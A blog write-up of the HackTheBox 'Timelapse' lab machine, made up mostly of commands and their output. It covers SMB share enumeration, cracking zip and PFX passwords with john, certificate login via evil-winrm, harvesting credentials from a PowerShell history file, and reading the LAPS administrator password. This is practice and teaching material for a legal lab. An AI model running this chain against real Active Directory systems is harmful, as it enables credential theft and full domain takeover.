Post

HackTheBox - Timelapse

Machine logo

Configuration

It is very useful to append /etc/hosts/ with ip address of the machine. It is useful to get subdomains and to not memorize the address every time.

1
$ echo '10.10.11.152 timelapse.htb' | sudo tee -a /etc/hosts 

Reconnaissance

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
$ nmap -p- timelapse.htb -Pn
Starting Nmap 7.92 ( https://nmap.org ) at 2022-06-29 11:10 UTC
Nmap scan report for timelapse.htb (10.10.11.152)
Host is up (0.056s latency).
Not shown: 65517 filtered tcp ports (no-response)
PORT      STATE SERVICE
53/tcp    open  domain
88/tcp    open  kerberos-sec
135/tcp   open  msrpc
139/tcp   open  netbios-ssn
389/tcp   open  ldap
445/tcp   open  microsoft-ds
464/tcp   open  kpasswd5
593/tcp   open  http-rpc-epmap
636/tcp   open  ldapssl
3268/tcp  open  globalcatLDAP
3269/tcp  open  globalcatLDAPssl
5986/tcp  open  wsmans
9389/tcp  open  adws
49667/tcp open  unknown
49673/tcp open  unknown
49674/tcp open  unknown
49696/tcp open  unknown
62020/tcp open  unknown

Nmap done: 1 IP address (1 host up) scanned in 111.03 seconds

It looks like an Active Directory domain.

Enumeration

Let’s start with smb enumeration. It is also can be done by simple smbclient.

1
2
3
4
5
6
7
8
9
10
11
12
$ crackmapexec smb timelapse.htb -u 'a' -p '' --shares
SMB         timelapse.htb   445    DC01             [*] Windows 10.0 Build 17763 x64 (name:DC01) (domain:timelapse.htb) (signing:True) (SMBv1:False)
SMB         timelapse.htb   445    DC01             [+] timelapse.htb\a: 
SMB         timelapse.htb   445    DC01             [+] Enumerated shares
SMB         timelapse.htb   445    DC01             Share           Permissions     Remark
SMB         timelapse.htb   445    DC01             -----           -----------     ------
SMB         timelapse.htb   445    DC01             ADMIN$                          Remote Admin
SMB         timelapse.htb   445    DC01             C$                              Default share
SMB         timelapse.htb   445    DC01             IPC$            READ            Remote IPC
SMB         timelapse.htb   445    DC01             NETLOGON                        Logon server share 
SMB         timelapse.htb   445    DC01             Shares          READ            
SMB         timelapse.htb   445    DC01             SYSVOL                          Logon server share

We can read 2 shares without login, now we connect with smbclient and search.

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
$ smbclient -N \\\\timelapse.htb\\Shares\\
smb: \> dir
  .                                   D        0  Mon Oct 25 15:39:15 2021
  ..                                  D        0  Mon Oct 25 15:39:15 2021
  Dev                                 D        0  Mon Oct 25 19:40:06 2021
  HelpDesk                            D        0  Mon Oct 25 15:48:42 2021

                6367231 blocks of size 4096. 1680031 blocks available
smb: \> cd Dev
smb: \Dev\> dir
  .                                   D        0  Mon Oct 25 19:40:06 2021
  ..                                  D        0  Mon Oct 25 19:40:06 2021
  winrm_backup.zip                    A     2611  Mon Oct 25 15:46:42 2021

                6367231 blocks of size 4096. 1680031 blocks available
smb: \Dev\> get winrm_backup.zip
smb: \Dev\> cd ..
smb: \> cd HelpDesk
smb: \HelpDesk\> dir
  .                                   D        0  Mon Oct 25 15:48:42 2021
  ..                                  D        0  Mon Oct 25 15:48:42 2021
  LAPS.x64.msi                        A  1118208  Mon Oct 25 14:57:50 2021
  LAPS_Datasheet.docx                 A   104422  Mon Oct 25 14:57:46 2021
  LAPS_OperationsGuide.docx           A   641378  Mon Oct 25 14:57:40 2021
  LAPS_TechnicalSpecification.docx      A    72683  Mon Oct 25 14:57:44 2021

                6367231 blocks of size 4096. 1680031 blocks available
smb: \HelpDesk\> mget *

winrm_backup.zip archive has a password, we will try to brute it with john.

1
2
3
$ zip2john winrm_backup.zip > hash
$ john --wordlist=rockyou.txt hash
-- EDITED --    (winrm_backup.zip/legacyy_dev_auth.pfx)

legacyy_dev_auth.pfx is a PKCS#12 file format, contains the SSL certificate (public keys) and the corresponding private keys. But it requires password to extract. Let’s convert it to hash and brute it again!

1
2
3
$ pfx2john legacyy_dev_auth.pfx > hash
$ john --wordlist=rockyou.txt hash
-- EDITED --       (legacyy_dev_auth.pfx)

Now we got the password and able to extract a certificate and a private key. We use openssl library to do that.

1
2
$ openssl pkcs12 -in legacyy_dev_auth.pfx -nocerts -out private.key
$ openssl pkcs12 -in legacyy_dev_auth.pfx -clcerts -nokeys -out certificate.crt

user.txt

Now we have a certificate and a private key. We can use them to auth into the machine with evil-winrm.

1
2
3
4
5
$ evil-winrm -i timelapse.htb -S -k private.key -c certificate.crt
*Evil-WinRM* PS C:\Users\legacyy\Documents>
*Evil-WinRM* PS C:\Users\legacyy\Documents> cd ..
*Evil-WinRM* PS C:\Users\legacyy> type Desktop\user.txt
XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX # Edited

root.txt

Here we have to search. By searching in Program Files folder, we have to note that LAPS in installed and enabled. We can upload and execute winPEAS. It will show us a command history file.

PowerShell history file

Let’s open it!

1
2
3
4
5
6
7
8
9
10
11
*Evil-WinRM* PS C:\Users\legacyy\Downloads> type C:\Users\legacyy\AppData\Roaming\Microsoft\Windows\PowerShell\PSReadLine\ConsoleHost_history.txt
whoami
ipconfig /all
netstat -ano |select-string LIST
$so = New-PSSessionOption -SkipCACheck -SkipCNCheck -SkipRevocationCheck
$p = ConvertTo-SecureString '-- EDITED --' -AsPlainText -Force
$c = New-Object System.Management.Automation.PSCredential ('svc_deploy', $p)
invoke-command -computername localhost -credential $c -port 5986 -usessl -
SessionOption $so -scriptblock {whoami}
get-aduser -filter * -properties *
exit

We can see the credentials here: svc_deploy:-- EDITED --.

svc_deploy user is a member of LAPS_Readers group, which can extract Local Administrator password. We are using crackmapexec to do that.

1
2
3
$ crackmapexec smb timelapse.htb -u 'svc_deploy' -p '-- EDITED --' --laps  
SMB         timelapse.htb   445    DC01             [*] Windows 10.0 Build 17763 x64 (name:DC01) (domain:timelapse.htb) (signing:True) (SMBv1:False)
SMB         timelapse.htb   445    DC01             [-] DC01\administrator:-- EDITED -- STATUS_LOGON_FAILURE

Then, we got it: administrator:-- EDITED --. It’s time to log in and get the flag!

1
2
3
4
5
6
$ evil-winrm -i timelapse.htb -u 'administrator' -p '-- EDITED --' -S
*Evil-WinRM* PS C:\Users\Administrator\Documents> gci -Path C:\ -Recurse -Include 'root.txt'
    Directory: C:\Users\TRX\Desktop
-ar---         7/1/2022   9:25 AM             34 root.txt
*Evil-WinRM* PS C:\Users\Administrator\Documents> type ../../TRX/Desktop/root.txt
XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX # Edited

It was in unusual location, so we had to search for it with Get-ChildItem.

Conclusion

I’ve really enjoyed the box. It was interesting to learn some new things.

Thank you for reading, I hope it was useful for you ❤️

This post is licensed under CC BY 4.0 by the author.